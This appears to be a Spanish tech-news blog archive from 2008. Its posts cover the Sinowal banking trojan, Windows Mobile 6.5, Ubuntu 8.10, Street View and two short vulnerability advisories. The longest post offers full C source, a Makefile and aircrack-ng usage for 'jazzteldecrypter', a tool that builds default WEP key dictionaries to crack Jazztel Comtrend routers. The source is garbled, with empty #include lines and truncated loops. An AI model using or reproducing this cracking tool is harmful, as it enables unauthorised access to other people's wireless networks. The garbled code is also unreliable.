1 troyano + 3 años = 550.000 datos bancarios online

2008-10-31

por : Jesús Maturana: 31 Oct 2008, 17:21

El laboratorio de investigación RSA FraudAction ha descubierto los datos de aproximadamente 300.000 cuentas online y 250.000 tarjetas de crédito y débito que han sido conseguidas por una banda de cibercrimen durante los últimos 3 años usando el troyano Sinowal.

Según una entrada en el blog de RSA a día de hoy: “Este podría ser una de las más generalizada y usadas piezas de crimeware jamás creadas por timadores“. El troyando Sinowal infecta ordenadores sin el conocimiento del dueño/usuario gracias al ataque conocido como guiado mediante descarga. El código malicioso se esconde típicamente en una página web poco conocida, a menudo relacionada con pornografía o apuestas online, pero también ha habido algún caso en el que se hospedaba en páginas legítimas.

El troyano está programado para ser puesto en marcha cuando la víctima visita alguna página financiera o bancaria particular de entre 2.700 URLs que tiene programadas según RSA. El dichas páginas el malware agrega campos adicionales para rellenar como son el PIN o el número de la seguridad social.

La información recogida ha sido robada al menos desde febrero de 2006, de manera ininterrumpida y los datos capturados incluyen además de cuentas y datos bancarios y financieros, cuentas de email y FTP.

febrero 2006 - octubre 2008

¿Estamos realmente seguros ante este tipo de amenazas? Teniendo en cuenta que este tipo de troyanos están programados para funcionar principalmente en Windows, ¿un sistema Linux podría ser víctima de este tipo de ataques de forma sencilla? o dicho de otra manera, ¿si el potencial dedicado a explotar problemas en Windows se enfocara principalmente a un sistema Linux / Mac / FreeBSD … ofrecería la misma seguridad que actualmente parece aportar a sus usuarios?

vINQulos
CNet

FUENTE :http://www.theinquirer.es/2008/10/31/1-troyano-3-anos-550000-datos-bancarios-online.html
31 Oct 2008 por wolfbcn

Categories : Noticias
0 comments

Windows Mobile 6.5

2008-10-31


Parece ser que Windows Mobile 7 no será la próxima versión del sistema operativos para dispositivos móviles de Microsoft.

Todos creíamos que la próxima versión de Windows Mobile sería la 7, prevista para el segundo semestre del 2009.

Sin embargo Sanjay Jha , CEO de Motorola para dispositivos móviles, ha desvelado un dato ciertamente interesante.

Según Sanjay Jah su compañía tiene previsto que los primeros teléfonos basados en Windows Mobile 6.5 esten disponibles durante el segundo semestre de 2009, la misma fecha en la que supuestamente Microsoft tiene previsto haber ultimado el desarrollo de Windows Mobile 7.

No termina de quedar claro si estamos hablando de una actualización de Windows Mobile 6.1, de otro nombre para el ya anunciado Windows Mobile 7, o de un retraso del mismo.

Finalmente y a modo de anécdota señalar que Sanjay Jah también menció que su compañía tenía previsto lanzar un teléfono basado en Android para el año próximo.

Categories : Noticias
0 comments

Vulnerabilidad de inyección SQL en TLM CMS v3.1

2008-10-30

Vulnerabilidad de inyección SQL en TLM CMS v3.1, permite a atacantes remotos ejecutar comandos SQL de su elección a través del parámetro “nom” al a-b-membres.php. NOTA:el vector goodies.php actualmente está cubierto por CVE-2007-4808. NOTA: el origen de esta información es desconocido; los detalles han sido obtenidos a partir de terceros.

Categories : Vulnerabilidades
0 comments

Vulnerabilidad de subida de fichero sin restricción en el módulo DownloadsPlus en PHP-Nuke,

2008-10-30

Vulnerabilidad de subida de fichero sin restricción en el módulo DownloadsPlus en PHP-Nuke, permite a atacantes remotos ejecutar código de su elección a través la subida de ficheros con la extensión (1) .htm, (2) .html, o (3) .txt y después accediendo a ellos mediante una petición directa al archivo. NOTA: el origen de esta información es desconocido. Los detalles han sido obtenidos de terceros. NOTA: no está claro cómo permitiendo la subida de archivos .txt o .html se permite la ejecución arbitraria de código; es posible que sea una funcionalidad legítima.

Categories : Vulnerabilidades
0 comments

jazzteldecrypter

2008-10-30

Metiendo la pata sin permiso en el codigo C de wlandecrypter, original de Nilp0inteR. He modificado el programa para obtener por diccionario la clave WEP de los ESSID tipo JAZZTEL_xx con BSSID tipo 00:1A:2B y como minimo solo 5 IVS.

jazzteldecrypter.c
Código:

/*****************************************************************************
* Fichero: jazzteldecrypter.c
* Fecha: 23-03-2006
* Autor: Nilp0inteR (nilp0inter2k6[at]gmail[dot]com)
* Actualizado: 2008 buckynet
*
* Descripcion: Generador de diccionario de claves por defecto para los
* router de Jazztel Comtrend.
*
* Este programa es software libre; puedes redistribuirlo y/o modificarlo
* bajo los terminos de la Licencia Publica General GNU (GPL) publicada
* por la Free Software Foundation; en su version numero 2, o (bajo tu
* criterio) la ultima version. Mira http://www.fsf.org/copyleft/gpl.txt.
*
* Este programa se distribuye SIN GARANTIA de ningun tipo.
*
*****************************************************************************/

#include
#include
#include

//
// Numero de modelos de routers en la base de datos
//
#define MAXROUTER 12
#define MAXINDEX 1
#define VERSION 0
#define SUBVERSION 0

//
// Tipo de dato Router, con toda la informacion
//
typedef struct Router
{
char bssid[9];
char init[MAXINDEX][8];
char notas[30];
} tRouter;

//
// Variables globales
//
char hex[16]=”0123456789ABCDEF”;

//
// Funciones
//
void initRouters(tRouter routers[MAXROUTER]);
void datosRouters(tRouter routers[MAXROUTER]);
void muestraAyuda();
int buscaBssid(tRouter routers[MAXROUTER], char *bssid);
void imprimeClaves(FILE *fichero, tRouter routers[MAXROUTER], int bssidId, char *keyEnd);

//
// MAIN !!!
//
int main(int argc, char *argv[])
{
int bssidId, i;
int validHex=0;
char endKey[2];
tRouter routers[MAXROUTER];
FILE *fichero;

if(argc<3 || argc>4)
{
muestraAyuda();
return 1;
}

fprintf(stderr, “\njazzteldecrypter %i.%i - (c) 2008 nilp0inter2k6\n”, VERSION, SUBVERSION);

if(strlen(argv[1])!=17)
{
fprintf(stderr,” [-] Longitud de BSSID invalida\n”);
return 1;
}

initRouters(routers);
datosRouters(routers);

bssidId=buscaBssid(routers, argv[1]);

if(bssidId==-1)
{
fprintf(stderr, ” [-] BSSID no encontrado\n”);
return 1;
}
else
{
fprintf(stderr, ” [+] BSSID: %s\n”
” [+] Modelo: %s\n”, argv[1], routers[bssidId].notas);

for(i=0;i argv[2][i]=toupper(argv[2][i]);

if(strlen(argv[2]) != 10 || strncmp("JAZZTEL_", argv[2], 8) != 0 )
{
fprintf(stderr, " [-] ESSID: %s invalido!!\n", argv[2]);
return 1;
}
else
{
for(i=0;i {
if(argv[2][8]==hex[i])
{
validHex++;
break;
}
}
for(i=0;i {
if(argv[2][9]==hex[i])
{
validHex++;
break;
}
}

if(validHex!=2)
{
fprintf(stderr, " [-] ESSID: %s invalido!!\n", argv[2]);
return 1;
}
else
{
endKey[0]=argv[2][8];
endKey[1]=argv[2][9];

fprintf(stderr," [+] ESSID: %s\n", argv[2]);

if(argc>3) // Fichero
{

fprintf(stderr,” [+] Fichero de claves: %s\n”, argv[3]);
fichero=fopen(argv[3], “a+”);
if(fichero!=NULL)
{
imprimeClaves(fichero,routers,bssidId,endKey);
fclose(fichero);
fprintf(stderr, ” [+] Fichero guardado\n”);
}
else
{
fprintf(stderr,” [-] Error al abrir el fichero\n”);
return 1;
}
}
else
{
fprintf(stderr,” [+] Seleccionada salida estandar\n”);
imprimeClaves(stdout,routers,bssidId,endKey);
}
}
}

}

return 0;
}

//
// Vacia la estructura routers
//
void initRouters(tRouter routers[MAXROUTER])
{
int i,j;
for(j=0;j {
strcpy(routers[j].bssid,"");
for(i=0;i<5;i++)
strcpy(routers[j].init[i],"");
strcpy(routers[j].notas,"");
}
}

//
// Introduce los datos de los modelos conocidos
//
void datosRouters(tRouter routers[MAXROUTER])
{
int i =0;
// Comtrend
strcpy(routers[i].bssid,"00:1A:2B\0");
strcpy(routers[i].init[0],"E001D20\0");
strcpy(routers[i].notas,"Comtrend\0");
i++;
}

//
// Muestra la ayuda del programa
//
void muestraAyuda()
{
fprintf(stderr, "\njazzteldecrypter %i.%i - (c) 2008 nilp0inter2k6\n", VERSION, SUBVERSION);

fprintf(stderr, " uso: jazzteldecrypter [output file]\n\n”);
}

//
// Busca el bssid en la estructura y devuelve el identificador o
// -1 si no existe
//
int buscaBssid(tRouter routers[MAXROUTER], char *bssid)
{
int i;

for(i=0;i bssid[i]=toupper(bssid[i]);

for(i=0;i {
if(strncmp ( routers[i].bssid, bssid, 8 ) == 0)
return i;
}

return -1;
}

//
// Imprime las claves en un fichero
//
void imprimeClaves(FILE *fichero, tRouter routers[MAXROUTER], int bssidId, char *keyEnd)
{
int i,j,k,l,index=0;

while(index {
for(i=0;i<16;i++)
for(j=0;j<16;j++)
for(k=0;k<16;k++)
for(l=0;l<16;l++)
{
fprintf(fichero, "%s%c%c%c%c%c%c\n",routers[bssidId].init[index],hex[i],hex[j],hex[k],hex[l],keyEnd[0],keyEnd[1]);
}
index++;
}

}

make
Código:

CC = gcc
CFLAGS = -g -O2
OPTFLAGS = -D_FILE_OFFSET_BITS=64

prefix = /usr
sbindir = $(prefix)/sbin

DESTDIR =
SBINFILES = jazzteldecrypter

all: jazzteldecrypter

jazzteldecrypter: jazzteldecrypter.c
$(CC) $(CFLAGS) $(OPTFLAGS) jazzteldecrypter.c -o jazzteldecrypter

install:
install -d $(DESTDIR)$(sbindir)
install -m 755 $(SBINFILES) $(DESTDIR)$(sbindir)

uninstall:
rm -f $(DESTDIR)$(sbindir)/jazzteldecrypter

clean:
rm -f jazzteldecrypter

Instalacion:
Código:

make clean && make && make install

Uso:
Código:

jazzteldecrypter [output file]

Ejemplo:
Código:

jazzteldecrypter 00:11:22:33:44:55 JAZZTEL_XX diccionario.txt
aircrack-ng -b 00:11:22:33:44:55 -w diccionario.txt captura.cap

Tambien los scripts de airoscript y airoway tienen una opcion mas

Un saludo.

PD: Como siempre, en algo, habre metido la pata.

Descargalo
http://www.fileden.com/files/2008/10/11/2138272/jazzteldecrypter.c
texto copiado de Seguridad Wireless

Categories : Vulnerabilidades
0 comments

Ubuntu 8.10

2008-10-30

Ya está disponible para su descarga la versión definitiva de Ubuntu: “Intrepid Ibex”.

Una versión que dota al navegador Nautilus de pestañas, directorio privado encriptado, sesión de usuario invitado, Network Manger 0.7, nueva versión de Samba, nuevo administrador de conexiones con 3G, instalación con llaveros USB, etc…

Tal y como era de esperar el lanzamiento ha provocado que la página oficial se encuentre en estos momentos totalmente saturada, por lo que es probable que algunos de los enlaces que os proponemos al final del artículo no se encuentren operativos.

Para aquellos que queráis actualizar desde Hardy Heron a Ubuntu Intrepid Ibex recordaros que la actualización no se producirá de manera automática, ya que la Hardy Heron es una LTS, pero la Intrepid Ibex no.

No obstante también os proporcionamos un enlace desde el que nos proporcionan unas sencillas instrucciones para actualizar.

(Descarga recomendada desde el enlace BitTorrent).

http://releases.ubuntu.com/8.10/ubuntu-8.10-desktop-i386.iso.torrent

Categories : LINUX
0 comments

Google Street View ya disponible en algunas ciudades de España

2008-10-30

Google Street View ya disponible en algunas ciudades de España.
Redacción, 28/10/2008 (08:28).

Tal y como os anunciábamos la semana pasada Google Maps ya incluye a España dentro de los países que soportan Street View.

Una nueva e interesante funcionalidad que lleva desde algún tiempo funcionando para algunas ciudades de Francia, Italia, Japón, Australia y Estados Unidos y que permite a los usuarios explorarlas a través de imágenes de 360º.

Desde hace algunos meses se han avistado vehículos de Google Street View circulando por varias ciudades de nuestro país, tomando imágenes para el nuevo servicio.

Por el momento Street View está disponible en las ciudades de Madrid, Barcelona, Valencia y Sevilla.

Categories : Noticias
0 comments